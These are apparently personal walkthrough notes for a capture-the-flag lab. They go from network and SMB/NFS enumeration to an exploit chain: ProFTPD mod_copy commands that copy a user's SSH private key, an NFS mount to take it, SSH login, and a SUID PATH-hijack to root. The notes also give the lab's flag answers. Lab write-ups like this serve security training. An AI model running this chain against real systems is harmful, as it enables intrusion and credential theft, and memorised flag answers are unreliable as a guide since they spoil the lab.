Task_1
** nmap -sC -sV 10.10.213.105
A: 7ports >> 21,22,80,111,139,445,2049
///
Task_2
** nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.213.105
A: 3
===
Once you're connected, list the files on the share. What is the file can you see?
** smbclient //10.10.213.105/anonymous
(no password)
** ls
A: log.txt
===
What port is FTP running on?
** nmap -sC -sV 10.10.213.105
A: 21
===
What mount can we see?
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.213.105
A: /var
///
Task_3
What is the version?
** ncat 10.10.213.105 21
A: 1.3.5
====
How many exploits are there for the ProFTPd running?
** searchsploit proftpd 1.3.5
(This is like a google search, more with searchsploit -h)
A: 4 (but I actually only see 3 listed, need to check later)
===
enumerating ProFTPD:
** nc 10.10.213.105 21

220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.213.105]

SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name

SITE CPTO /var/tmp/id_rsa
250 Copy successful
===
Mounting Samba:
** nano log.txt 
** mkdir /mnt/kenobi >> this will be the mount point
** mount 10.10.213.105:/var /mnt/kenobi/
** cd /mnt/kenobi/
** ls -la >> lists all hiden files
** cd tmp/
** cp id_rsa /root/Downloads/
** cd (back to main directory)
** cd Downloads/
** sudo chmod 600 id_rsa
===
Logging in with Samba:
** ssh -i id_rsa kenobi@10.10.213.105
** yes
** ls
** cat user.txt 
A: d0b0f3f53b6caa532a83915e19224899
===
What file looks particularly out of the ordinary? 
** find / -perm -u=s -type f 2>/dev/null
A: /usr/bin/menu
===
Run the binary, how many options appear?
** /usr/bin/menu
A: 3
===
What is the root flag (/root/root.txt)?
**echo /bin/bash > curl
** chmod 777 curl
** export PATH=/tmp:$PATH
** cp curl /tmp
** menu >>  ** Enter your choice : 1
** id (check for perms/if you are root)
** cat /root/root.txt
A: 177b3cd8562289f37382721c28381f02